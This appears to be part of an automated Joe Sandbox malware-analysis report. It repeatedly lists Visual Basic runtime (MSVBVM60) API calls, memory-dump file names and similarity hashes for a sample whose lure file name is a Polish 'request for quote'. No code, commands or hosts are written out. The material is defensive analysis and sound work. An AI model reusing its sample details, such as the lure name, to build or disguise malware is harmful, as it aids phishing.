                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$Free$Error$#631System$#616ListUnlock$BoundsBstrGenerate$CopyLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1595817071-0
                                                                                                                                                                                                                                                      • Opcode ID: fb2a2bfa88c22efa9ac14300410e64a9e07382cf4d2ae5499a4c189e4441db04
                                                                                                                                                                                                                                                      • Instruction ID: 643dac4b4df38dfcdabcb7d24b6f5cff0a220186fca35a0c0bc2019b66c0cc28
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb2a2bfa88c22efa9ac14300410e64a9e07382cf4d2ae5499a4c189e4441db04
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78E119B0E002189BDB14DFA5DD84AEEBBB9FF48300F50856EE50AE7250DB745986CF58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 00417261
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,?), ref: 00417294
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004172B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004172BE
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$ErrorFree$System$Unlock$#631BoundsBstrGenerateList$#616CopyLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1495372892-0
                                                                                                                                                                                                                                                      • Opcode ID: 22a3bcf0e505ccb7d1cfaf72ba36ede29405f1e0ff0f99610f098486df82b262
                                                                                                                                                                                                                                                      • Instruction ID: a67bb8bcd321ef6f9d89d5af411f850dddceec761c9aca37c4a66d17d3038916
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22a3bcf0e505ccb7d1cfaf72ba36ede29405f1e0ff0f99610f098486df82b262
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19C127B0E002199FCB14DFA5DD84AEEBBB9FB48300F50816EE50AA7250DB746985CF58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,?), ref: 00417209
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 0041722A
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 00417233
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$ErrorFree$System$Unlock$#631BoundsGenerateList$#616BstrCopyLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 591398060-0
                                                                                                                                                                                                                                                      • Opcode ID: 961b67fc1f124d54495ebaca63011b730f5cf7ed414c292a9bb7346f90505c59
                                                                                                                                                                                                                                                      • Instruction ID: 5850bdb2f8cb840655fe358dbb68f1bf167492e12e76f8ba6df4694bbfc137e4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 961b67fc1f124d54495ebaca63011b730f5cf7ed414c292a9bb7346f90505c59
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88C117B0E002199FDB14DFA9DD84AEEBBB9FB48300F50816EE509A7250DB746985CF58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000000,Function_00009254,00000000,00000000), ref: 00417157
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 00417180
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$ErrorFreeMove$BstrSystemUnlock$#616#631BoundsCopyGenerateListLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4020600759-0
                                                                                                                                                                                                                                                      • Opcode ID: 01b4123d1384e175d7db15ed5fda37c47c0d54542c8545c3d7772e666950e406
                                                                                                                                                                                                                                                      • Instruction ID: 6f59f1f6fd00cf4eb64356afd8b00aa24b7c42f8971466ecdf1fdd0f8cb9e506
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 01b4123d1384e175d7db15ed5fda37c47c0d54542c8545c3d7772e666950e406
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8C108B1E00218DFDB14DFA9DD84AEEBBB9FB48300F50816EE509A7250DB745985CF58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • #709.MSVBVM60(00000000,Function_00009254,00000000,00000000), ref: 004171A4
                                                                                                                                                                                                                                                      • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                                                                                                                                                                                      • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                                                                                                                                                                                      • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                                                                                                                                                                                      • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                                                                                                                                                                                      • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$ErrorFreeMove$SystemUnlock$#616#631#709BoundsBstrCopyGenerateListLockOverflow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2767930602-0
                                                                                                                                                                                                                                                      • Opcode ID: da9e1a5cc3e3cb8c691cd4fe22436f69490de0b4f09a0e23afe83290d4890e94
                                                                                                                                                                                                                                                      • Instruction ID: fd14dd4b6f58a52c042ba838fbe59068618bb76b1adec8898ddb627e80e0b945
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da9e1a5cc3e3cb8c691cd4fe22436f69490de0b4f09a0e23afe83290d4890e94
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DB118B1E00218DFDB24DFA5DD84AEEBBB9FB48300F50816EE509A7250DB745985CF58
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaAryLock.MSVBVM60(?,00000000,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00417B35
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                                                                                                                                                                                      • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,004096D4,00000000,00000001), ref: 00417CE8
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417CEF
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(004096D4,00000000), ref: 00417CF7
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417CFE
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(?,00000000), ref: 00417D05
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417D0C
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(004096D4,00000000), ref: 00417D14
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417D1B
                                                                                                                                                                                                                                                      • __vbaInStr.MSVBVM60(00000001,00000000), ref: 00417D20
                                                                                                                                                                                                                                                      • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00417D41
                                                                                                                                                                                                                                                      • #618.MSVBVM60(00000000,00000003), ref: 00417D6E
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417D79
                                                                                                                                                                                                                                                      • __vbaStrCat.MSVBVM60(Function_00009254,004096CC,00000000), ref: 00417D86
                                                                                                                                                                                                                                                      • __vbaStrMove.MSVBVM60 ref: 00417D8D
                                                                                                                                                                                                                                                      • __vbaStrCmp.MSVBVM60(00000000), ref: 00417D90
                                                                                                                                                                                                                                                      • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,6CF7A323,6CF8D8B1,6CF8D8E2), ref: 00418B33
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?,00418BE2), ref: 00418BB3
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00418BBC
                                                                                                                                                                                                                                                      • __vbaAryUnlock.MSVBVM60(?), ref: 00418BC5
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00418BD0
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00418BD5
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00418BDA
                                                                                                                                                                                                                                                      • __vbaFreeStr.MSVBVM60 ref: 00418BDF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026772498.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026333371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026486000.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026855820.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026877233.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __vba$Move$ErrorFree$SystemUnlock$BoundsGenerateList$#618Lock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2878159455-0
                                                                                                                                                                                                                                                      • Opcode ID: 5be16d220d7e56eae9262f8b4a6e97e2f65e3b200773761827ff221150c3b68a
                                                                                                                                                                                                                                                      • Instruction ID: 2780b2efc1f4126fd3daf783c884f47e51bc0b84df1625baa5224246725a4293
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5be16d220d7e56eae9262f8b4a6e97e2f65e3b200773761827ff221150c3b68a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A7117B0E042189FCB14DFA9DDC4AEEBBB5FB48300F6081AEE509A7250DB745A85CF54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __vbaStrCopy.MSVBVM60(6D076537,00000000,00000000), ref: 00425A0A
